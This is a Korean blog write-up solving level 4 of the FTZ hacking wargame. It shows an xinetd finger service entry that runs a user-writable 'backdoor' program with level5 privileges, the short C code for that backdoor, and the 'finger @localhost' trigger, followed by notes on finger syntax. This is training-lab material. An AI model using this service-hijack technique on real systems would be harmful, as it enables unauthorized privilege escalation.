FTZ-level4
service finger
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = level5
server = /home/level4/tmp/backdoor
log_on_failure += USERID
}
"finger을 사용할 때 level5의 권한으로 /home/level4/tmp/backdoor을 실행한다."라고 생각하면 쉽다.
#include <stdio.h>
int main()
{
system("my-pass");
return 0;
}
-backdoor.c 코드
즉, my-pass 명령을 실행하도록 하는 C코드
$finger @localhost
:가장 이해가 되지 않았었다. 사실 다른 블로그의 풀이를 보고 알았는데 왜 localhost를 쓰는지 알지 못해서 많은 시간을 소비했다.
-리눅스 finger
-$ finger
finger만 치면 현재 시스템에 로그인 되어 있는 사용자들을 보여준다.
finger만 치면 현재 시스템에 로그인 되어 있는 사용자들을 보여준다.
-$ finger user명
user를 적고 host명을 명시하지 않으면, finger는 로컬에 접속하게 된다.
user를 적고 host명을 명시하지 않으면, finger는 로컬에 접속하게 된다.
-$ finger @host명
host명만 적고 user를 명시하지 않으면, 해당서버의 접속해 있는 모든 유저의 정보를 출력한다.
host명만 적고 user를 명시하지 않으면, 해당서버의 접속해 있는 모든 유저의 정보를 출력한다.
-$ finger user명 @host명
-$ finger @host명 user명
user명과 호스트명을 이런식으로 기입하면 원격서버의 사용자계정정보 확인하는 것이 된다.
-$ finger @host명 user명
user명과 호스트명을 이런식으로 기입하면 원격서버의 사용자계정정보 확인하는 것이 된다.
localhost는 127.xxx.xxx.xxx의 별칭이다. 즉 서버주소, 지금 컴퓨터가 서버 주소가 되는 것이다. (local+host) finger 가 서버의 접속유저 리스트를 받아오는 것인데 일단 그럼 어느서버에 접속해야하는지 알기위해 인자로 대상서버를 넘겨주어야 한다. 근데 그 서버는 지금 로컬에 열려잇으니 localhost로 한것 같습니다.
0 개의 댓글